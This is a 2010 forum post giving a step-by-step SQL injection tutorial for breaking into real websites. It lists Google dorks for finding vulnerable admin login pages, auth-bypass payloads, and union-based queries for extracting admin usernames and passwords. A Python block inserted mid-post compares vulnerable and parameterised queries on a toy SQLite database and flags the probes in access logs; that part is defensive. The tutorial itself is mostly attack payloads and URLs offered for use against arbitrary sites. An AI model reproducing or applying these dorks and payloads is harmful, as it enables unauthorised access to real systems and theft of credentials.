Waraxe IT Security Portal
Detailed Basic and Full SQL Injection Tutorial
Posted: Sun Feb 21, 2010 7:53 am
Ruyuk (Regular user; Joined: Feb 21, 2010; Posts: 10; Location: Romania)

Q: What is SQL injection?

A: Injecting SQL queries into another database, or using queries to get auth bypass as an admin.

Part 1: Basic SQL injection

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp.
First we need to find a site; start by opening Google.
Now we type our dork:
(Definition of "dork": a search entry for a certain type of site/exploit, etc.)
There are a large number of Google dorks for basic SQL injection.
Here are the best:

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now, what to do once we get to our site.
The site should look something like this:

welcome to xxxxxxxxxx administrator panel
username :
password :

So what we do here is: in the username field we always type "Admin",
and for our password we type our SQL injection.

Here is a list of SQL injections:

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'


There are many more, but these are the best ones that I know of.
What this SQL injection is doing: confusing the shit out of the database until it gives you auth bypass.

So your input should look like this:

Username: Admin
Password: 'or'1'='1

Also, remember: some sites don't use Admin as a login; try using Administrator too.

So click submit and you're in.
NOTE: not all sites are vulnerable.


Part 2: Injecting SQL queries to extract the admin username and password

OK, so let's say we have a site:
http://www.xxxxx.com/index.php?catid=1
There is a list of dorks for sites like this:

"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
Or the best in my view,
"inurl:".php?catid=" site:xxx"


So once you have your site
http://www.xxxx.com/index.php?catid=1
now we add a ' to the end of the URL,
so the site is
http://www.xxxx.com/index.php?catid=1'
If there is an error of some sort, then it is vulnerable.
Now we need to find the number of columns in the SQL database,
so we type:
http://www.xxxx.com/index.php?catid=1 order by 1-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 2-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 3-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 4-- "no error"
http://www.xxxx.com/index.php?catid=1 order by 5-- "error"

So this database has 4 columns, because we got an error on 5.
On some databases there are 2 columns and on some 200; it varies.
So once we have the column number, we try the union function:
http://www.xxxx.com/index.php?catid=1 union select 1,2,3,4-- "or whatever number of columns are in the database"
If you see some numbers like 1 2 3 4 on the screen, or the column names:
it might not show all numbers on the screen, but the numbers displayed are the ones you can replace to extract info from the DB.
So now we need info about the DB.
So let's say the numbers 2 and 4 showed up on the screen.
So I will use my query on 2:
http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
The DB type and version will pop up on the screen.
If the DB version is 4 or lower, then to extract the password you will need these queries:
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
This should display the table containing the admin username and password,
but if not then you will have to guess the table.
So once you have your table (or not),
then type:
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--
Where it says admintablename, type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess.
Then once you have the right table name you should get the administrator password.
Then just do the same thing but type username instead of password.
Sometimes the password is hashed and you need to crack it.
Then see if you can get the admin panel; if you can't, then try the admin panel finder script here: http://www.darkc0de.com/c0de/perl/admin_1.2_.txt
Now if the database is version 5 or up,
type:
http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
and that will display a list of all the tables.
Once you have your table name,
type the same thing as 4:
http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--
Then the same with username.
But now if it doesn't work for all those things,
just toy around with all the little catid=1 or catid=-1, or instead of -- put /* or even nothing;
just play around with those.
But sometimes we also need to use version() or @@version,
so sometimes UNION SELECT version(),password,3,4 FROM admintable--
or UNION SELECT @@version,password,3,4 FROM admintable--

Enjoy!
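The two weaknesses the post above walks through (Part 1, a login form that concatenates the password into its query; Part 2, a numeric catid parameter that is pasted into the statement so ORDER BY probing yields an error oracle) are reproduced below against an in-memory SQLite database, each beside its parameterised form, followed by a small check that picks the Part 2 probes out of access-log lines. This is an added example, not code from the post or from any site it mentions: the schema, the rows, the table and column names, and the log lines are all constructed for illustration, and the login payload is taken from the post's own list.

```python
"""
Vulnerable vs. parameterised forms of the two queries discussed in the post,
plus a log-line check for the URL probes. All data here is constructed.
"""
import re
import sqlite3
from urllib.parse import unquote_plus


def make_db():
    """Toy schema (assumed, not from the post): users for Part 1, news for Part 2."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'Admin', 'correct horse')")
    conn.execute("CREATE TABLE news (catid INTEGER, title TEXT)")
    conn.execute("INSERT INTO news VALUES (1, 'first post')")
    return conn


# ---- Part 1: the admin login form --------------------------------------------

def login_vulnerable(conn, username, password):
    """Builds the WHERE clause by string concatenation; the quote in the
    password closes the literal and the OR makes the predicate always true."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the input is data, never SQL text."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# ---- Part 2: the numeric catid parameter -------------------------------------

def news_vulnerable(conn, catid):
    """Concatenates the raw query-string value; 'ORDER BY n--' is executed as SQL."""
    return [r[0] for r in conn.execute("SELECT title FROM news WHERE catid = " + catid)]


def news_safe(conn, catid):
    """Allow-lists the value as a plain integer first, then binds it."""
    cid = int(catid)  # '1 order by 5--' raises ValueError before any SQL runs
    return [r[0] for r in conn.execute("SELECT title FROM news WHERE catid = ?", (cid,))]


def probe_outcome(conn, catid):
    """The column-count oracle the post relies on: 'ok' or 'error' per probe."""
    try:
        news_vulnerable(conn, catid)
        return "ok"
    except sqlite3.OperationalError:
        return "error"


# ---- Detection: the Part 2 probes as they appear in a web server access log --

# Constructed log lines in common log format. Note the Part 1 payload travels in
# a POST body, which a standard access log does not record; catching it needs an
# application log or WAF in front of the form.
LOG_LINES = [
    '10.0.0.5 - - [21/Feb/2010:07:53:00 +0000] "GET /index.php?catid=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [21/Feb/2010:07:53:04 +0000] "GET /index.php?catid=1%20order%20by%205-- HTTP/1.1" 500 88',
    '10.0.0.5 - - [21/Feb/2010:07:53:09 +0000] "GET /index.php?catid=1%20union%20select%201,2,3,4-- HTTP/1.1" 200 640',
    '10.0.0.7 - - [21/Feb/2010:07:55:00 +0000] "POST /admin/login.asp HTTP/1.1" 302 0',
]

# Signatures for the probes shown in the post: ORDER BY <n> followed by a
# comment, UNION SELECT, and the quote-OR-quote login pattern.
PROBE = re.compile(
    r"(?i)(\border\s+by\s+\d+\s*(?:--|#|/\*)|\bunion\s+(?:all\s+)?select\b|'\s*or\s*'?\w+'?\s*=)"
)


def flag_requests(lines):
    """Returns the log lines whose URL-decoded request path matches a probe signature."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) ', line)
        if m and PROBE.search(unquote_plus(m.group(1))):
            hits.append(line)
    return hits


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"  # first entry in the post's list
    print("vulnerable login:", login_vulnerable(db, "Admin", payload))
    print("safe login:     ", login_safe(db, "Admin", payload))
    for probe in ("1 order by 1--", "1 order by 2--"):
        print(probe, "->", probe_outcome(db, probe))
    for hit in flag_requests(LOG_LINES):
        print("probe seen:", hit)
```

The login functions differ only in how the value reaches the driver: with concatenation the predicate becomes `password = '' or '1'='1'`, so the first user row comes back regardless of the password; with placeholders the same string is compared literally and no row matches. For the integer parameter, `int()` rejects anything that is not a plain number, which removes the error oracle the column-count probing depends on; binding the resulting integer is then belt and braces. The log check is deliberately narrow (it keys on the exact forms in the post) so it produces few false positives; a production detector would decode more encodings and look at response sizes and status codes as well.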
Posted: Fri Mar 12, 2010 10:48 am
Ruyuk (Regular user; Joined: Feb 21, 2010; Posts: 10; Location: Romania)

No comments? :(
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"